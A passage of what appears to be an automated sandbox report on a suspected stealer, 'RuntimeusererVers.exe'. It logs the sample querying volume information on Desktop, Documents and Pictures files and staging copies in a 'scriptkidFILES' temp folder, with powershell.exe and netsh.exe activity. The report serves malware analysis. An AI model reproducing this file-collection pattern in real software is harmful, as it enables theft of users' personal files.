                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\EFOYFBOLXA VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\EWZCVGNOWT VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV\DUUDTUBZFW.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV\DUUDTUBZFW.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\PIVFAGEAAV\DUUDTUBZFW.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV\DUUDTUBZFW.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV\EEGWXUHVUG.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\PIVFAGEAAV VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV\EEGWXUHVUG.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV\EEGWXUHVUG.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV\EEGWXUHVUG.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\PIVFAGEAAV\EEGWXUHVUG.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV\EEGWXUHVUG.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV\EIVQSAOTAQ.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\PIVFAGEAAV VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV\EIVQSAOTAQ.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV\EIVQSAOTAQ.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\PIVFAGEAAV\EIVQSAOTAQ.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV\EIVQSAOTAQ.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV\GRXZDKKVDB.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\PIVFAGEAAV\GRXZDKKVDB.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV\KLIZUSIQEN.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\PIVFAGEAAV\KLIZUSIQEN.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV\KLIZUSIQEN.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV\PIVFAGEAAV.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\PIVFAGEAAV VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV\PIVFAGEAAV.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV\PIVFAGEAAV.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\PIVFAGEAAV\PIVFAGEAAV.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV\PIVFAGEAAV.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE\BNAGMGSPLO.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE\BNAGMGSPLO.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE\BNAGMGSPLO.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\PWCCAWLGRE\BNAGMGSPLO.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE\BNAGMGSPLO.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE\EEGWXUHVUG.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE\EEGWXUHVUG.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE\EEGWXUHVUG.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE\EEGWXUHVUG.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE\PIVFAGEAAV.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE\PIVFAGEAAV.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE\PIVFAGEAAV.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE\PWCCAWLGRE.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\PWCCAWLGRE\PWCCAWLGRE.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE\PWCCAWLGRE.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE\SQSJKEBWDT.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\PWCCAWLGRE VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE\SQSJKEBWDT.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE\SQSJKEBWDT.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\PWCCAWLGRE\SQSJKEBWDT.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE\SQSJKEBWDT.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE\SUAVTZKNFL.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\PWCCAWLGRE VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE\SUAVTZKNFL.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE\SUAVTZKNFL.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\PWCCAWLGRE\SUAVTZKNFL.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE\SUAVTZKNFL.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\QCOILOQIKC VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\BJZFPPWAPT.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\SUAVTZKNFL\BJZFPPWAPT.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\BJZFPPWAPT.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\BNAGMGSPLO.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\SUAVTZKNFL VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\BNAGMGSPLO.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\BNAGMGSPLO.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\BNAGMGSPLO.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\SUAVTZKNFL\BNAGMGSPLO.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\DUUDTUBZFW.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\SUAVTZKNFL VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\DUUDTUBZFW.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\DUUDTUBZFW.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\SUAVTZKNFL\DUUDTUBZFW.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\DUUDTUBZFW.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\SUAVTZKNFL VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\EEGWXUHVUG.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\EEGWXUHVUG.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\EEGWXUHVUG.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\SUAVTZKNFL\EEGWXUHVUG.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\EEGWXUHVUG.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\EFOYFBOLXA.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\SUAVTZKNFL VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\EFOYFBOLXA.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\EFOYFBOLXA.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\SUAVTZKNFL\EFOYFBOLXA.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\EFOYFBOLXA.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\SUAVTZKNFL.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\SUAVTZKNFL VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\SUAVTZKNFL.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\SUAVTZKNFL.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\SUAVTZKNFL.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\SUAVTZKNFL\SUAVTZKNFL.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\SUAVTZKNFL.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\ZGGKNSUKOP VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Pictures VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Pictures\Camera Roll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Pictures\Saved Pictures VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Documents\BJZFPPWAPT.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Documents\BJZFPPWAPT.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Documents\BJZFPPWAPT.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Documents\BJZFPPWAPT.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Documents\BNAGMGSPLO.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Documents VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_ssl.pyd VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_ssl.pyd VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_ssl.pyd VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_ssl.pyd VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\multidict VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\multidict VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\multidict VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
